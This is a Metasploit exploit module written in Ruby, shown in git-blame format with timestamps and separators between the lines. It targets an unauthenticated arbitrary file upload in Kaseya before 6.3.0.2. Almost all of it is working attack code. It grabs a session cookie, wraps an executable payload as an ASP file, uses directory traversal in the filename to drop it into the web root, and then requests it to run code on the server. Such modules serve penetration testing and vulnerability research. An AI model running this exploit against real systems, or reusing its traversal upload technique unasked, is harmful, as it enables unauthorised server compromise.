2013-11-18 01:23:34 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-11-19 23:27:22 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-11-18 01:23:34 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-11-27 03:00:00 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
include Msf::Exploit::FileDropper
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Kaseya uploadImage Arbitrary File Upload',
|
|
|
|
'Description' => %q{
|
2013-12-03 15:34:25 +00:00
|
|
|
This module exploits an arbitrary file upload vulnerability found in Kaseya versions below
|
|
|
|
6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous
|
|
|
|
authentication, leading to arbitrary code execution with IUSR privileges.
|
2013-11-27 03:00:00 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
2015-11-06 21:24:58 +00:00
|
|
|
'Thomas Hibbert <thomas.hibbert@security-assessment.com>' # Vulnerability discovery and MSF module
|
2013-11-27 03:00:00 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
2013-12-03 15:34:25 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['BID', '63782'],
|
|
|
|
['EDB', '29675'],
|
|
|
|
['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']
|
|
|
|
],
|
2013-11-27 03:00:00 +00:00
|
|
|
'Platform' => 'win',
|
|
|
|
'Arch' => ARCH_X86,
|
2013-12-03 15:34:25 +00:00
|
|
|
'Privileged' => false,
|
2013-11-27 03:00:00 +00:00
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Kaseya KServer / Windows', {} ],
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DisclosureDate' => 'Nov 11 2013'))
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => normalize_uri('SystemTab','uploadImage.asp')
|
|
|
|
})
|
2013-11-28 03:35:36 +00:00
|
|
|
|
2013-11-27 03:00:00 +00:00
|
|
|
# the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
|
2013-12-03 15:34:25 +00:00
|
|
|
unless res and res.code == 500
|
2013-12-03 00:49:31 +00:00
|
|
|
return Exploit::CheckCode::Unknown
|
2013-11-27 03:00:00 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
return Exploit::CheckCode::Appears
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Getting cookie...")
|
2013-11-28 03:35:36 +00:00
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri("SystemTab", "uploadImage.asp")
|
|
|
|
})
|
|
|
|
|
2013-12-03 15:34:25 +00:00
|
|
|
unless res and res.code == 500 and res.headers and res.headers.include?('Set-Cookie')
|
2015-04-16 19:44:56 +00:00
|
|
|
fail_with(Failure::Unknown, "#{peer} - Failed to get cookie")
|
2013-12-03 15:34:25 +00:00
|
|
|
end
|
|
|
|
|
2013-11-28 03:35:36 +00:00
|
|
|
cookie = res.get_cookies
|
2013-12-03 15:34:25 +00:00
|
|
|
@payload_name = "#{rand_text_alpha_lower(8)}.asp"
|
|
|
|
exe = generate_payload_exe
|
|
|
|
asp = Msf::Util::EXE.to_exe_asp(exe)
|
|
|
|
post_data = Rex::MIME::Message.new
|
|
|
|
post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}")
|
2014-02-11 04:23:23 +00:00
|
|
|
data = post_data.to_s
|
2013-11-28 03:35:36 +00:00
|
|
|
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Uploading payload...")
|
2013-11-28 03:35:36 +00:00
|
|
|
res = send_request_cgi({
|
2013-11-27 03:00:00 +00:00
|
|
|
"method" => "POST",
|
2013-12-03 15:34:25 +00:00
|
|
|
"uri" => normalize_uri("SystemTab", "uploadImage.asp"),
|
2013-12-03 00:49:31 +00:00
|
|
|
"vars_get" => {
|
|
|
|
"filename" => "..\\..\\..\\..\\#{@payload_name}"
|
2013-12-03 15:34:25 +00:00
|
|
|
},
|
2013-11-27 03:00:00 +00:00
|
|
|
"data" => data,
|
|
|
|
"ctype" => "multipart/form-data; boundary=#{post_data.bound}",
|
|
|
|
"cookie" => cookie
|
|
|
|
})
|
|
|
|
|
2013-12-03 15:34:25 +00:00
|
|
|
unless res and res.code == 200
|
2015-04-16 20:04:11 +00:00
|
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
|
2013-11-27 03:00:00 +00:00
|
|
|
end
|
|
|
|
|
2013-11-28 03:35:36 +00:00
|
|
|
register_files_for_cleanup(@payload_name)
|
|
|
|
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Executing payload #{@payload_name}")
|
2013-11-27 03:00:00 +00:00
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => normalize_uri(@payload_name),
|
|
|
|
'method' => 'GET'
|
|
|
|
})
|
|
|
|
end
|
|
|
|
end
|